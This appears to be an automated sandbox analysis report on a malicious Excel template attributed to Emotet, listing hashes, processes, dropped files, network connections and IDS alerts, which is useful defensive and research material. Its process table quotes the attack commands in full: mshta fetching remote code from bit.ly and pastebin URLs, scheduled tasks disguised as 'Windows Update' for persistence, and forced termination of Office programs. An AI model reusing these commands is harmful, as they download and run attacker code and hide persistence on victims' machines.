File name: | Specifications___9927265.xlt |
Full analysis: | https://app.any.run/tasks/8138b543-80bd-4122-a214-49c02fd0e482 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 11, 2019, 09:39:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: mana zaheer, Last Saved By: mana zaheer, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Sep 10 08:54:29 2019, Last Saved Time/Date: Tue Sep 10 08:55:13 2019, Security: 0 |
MD5: | 9D41CAA6DE6CEB6FBEEC9142496F9F89 |
SHA1: | A1056E4279D9DC1AAB97A20548628794424F5D8E |
SHA256: | 88FA4316062F115BDA55F5EE813F142F656F4C93C080E3EAFC2489BCF484A72C |
SSDEEP: | 1536:y1k3hbdlylKsgqopeJBWhZFGkE+cL2NdAVLviN5y7Mersnd/rH3FCXsqQjbfhgBJ:y1k3hbdlylKsgqopeJBWhZFGkE+cL2NS |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | Sheet1 |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:09:10 07:55:13 |
CreateDate: | 2019:09:10 07:54:29 |
Software: | Microsoft Excel |
LastModifiedBy: | mana zaheer |
Author: | mana zaheer |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3432 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 1 Version: 14.0.6024.1000 | ||||
2608 | mshta http://bit.ly/mylunlenahaiakslagaaki | C:\Windows\system32\mshta.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3924 | "C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/eS9WmF3u | C:\Windows\System32\mshta.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
1008 | "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 128 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2288 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn "Windows Update" /tr "mshta.exe http://pastebin.com/raw/W1fzJNbg" /F | C:\Windows\System32\schtasks.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2540 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 /tn "Update" /tr "mshta.exe http://pastebin.com/raw/Gt93FF9X" /F | C:\Windows\System32\schtasks.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3724 | taskkill /f /im winword.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3132 | taskkill /f /im excel.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3280 | taskkill /f /im MSPUB.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2204 | taskkill /f /im POWERPNT.EXE | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3432 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR9ADD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2608 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\authorization[1].css | — | |
MD5:— | SHA256:— | |||
2608 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\3704929657-widgets[1].js | — | |
MD5:— | SHA256:— | |||
3432 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFACE0084D7BA3C322.TMP | — | |
MD5:— | SHA256:— | |||
2608 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txt | text | |
MD5:8CC6C15FAB6090B61A306071EB94F853 | SHA256:66776FCB72A251DECFB40AB3AC30B48B9CCCBB5E02ED2DFDA8CF1DD8D2E7BF9F | |||
2608 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\95993233-ieretrofit[1].js | html | |
MD5:43AD0C19DD69995D18B1824C047A45A5 | SHA256:ED723AD81C8ADD8D98D9AEDA58DA6CB9DF591DF8A8C1712601A2932130DB783F | |||
3432 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Specifications___9927265.xlt.xls.LNK | lnk | |
MD5:913832E4F55C299B032FBF83BC5EA920 | SHA256:FCC9648CFABF4D4A9A62BA1180622C6770CA26BE1829304F17D5B1B7B31CC171 | |||
3432 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:AE1E1BA0C3A3D2A9A857992938066F2E | SHA256:FE401F4549F8C72DD09B71CCBA3B3DC7558C92309D403C711EB76F1427578AE9 | |||
2608 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\plusone[1].js | html | |
MD5:632E7FD3CA61FEF2DD2B7A9F847E5F34 | SHA256:D996E8927AE45383450BD8314F8BC89259A528AAA698231FE91D2295872D0496 | |||
2608 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\cb=gapi[1].loaded_0 | text | |
MD5:9592A9DDF920739FAD11ECB40E312905 | SHA256:AEF6EEB769CC25D6F1776C5F7E97AEF03258C9B5362D72F0D7955633EADF8F09 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2608 | mshta.exe | GET | 301 | 67.199.248.11:80 | http://bit.ly/mylunlenahaiakslagaaki | US | html | 140 b | shared |
3924 | mshta.exe | GET | 301 | 104.20.209.21:80 | http://www.pastebin.com/raw/eS9WmF3u | US | html | 721 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2608 | mshta.exe | 216.58.207.34:443 | pagead2.googlesyndication.com | Google Inc. | US | whitelisted |
2608 | mshta.exe | 67.199.248.11:80 | bit.ly | Bitly Inc | US | shared |
2608 | mshta.exe | 172.217.23.161:443 | myownteammana.blogspot.com | Google Inc. | US | whitelisted |
2608 | mshta.exe | 172.217.16.169:443 | www.blogger.com | Google Inc. | US | whitelisted |
2608 | mshta.exe | 216.58.205.238:443 | apis.google.com | Google Inc. | US | whitelisted |
2608 | mshta.exe | 172.217.22.45:443 | accounts.google.com | Google Inc. | US | whitelisted |
3924 | mshta.exe | 104.20.209.21:80 | www.pastebin.com | Cloudflare Inc | US | shared |
3924 | mshta.exe | 104.20.208.21:443 | www.pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
bit.ly |
| shared |
myownteammana.blogspot.com |
| whitelisted |
www.blogger.com |
| shared |
apis.google.com |
| whitelisted |
pagead2.googlesyndication.com |
| whitelisted |
resources.blogblog.com |
| whitelisted |
accounts.google.com |
| shared |
www.pastebin.com |
| shared |
pastebin.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2608 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3924 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |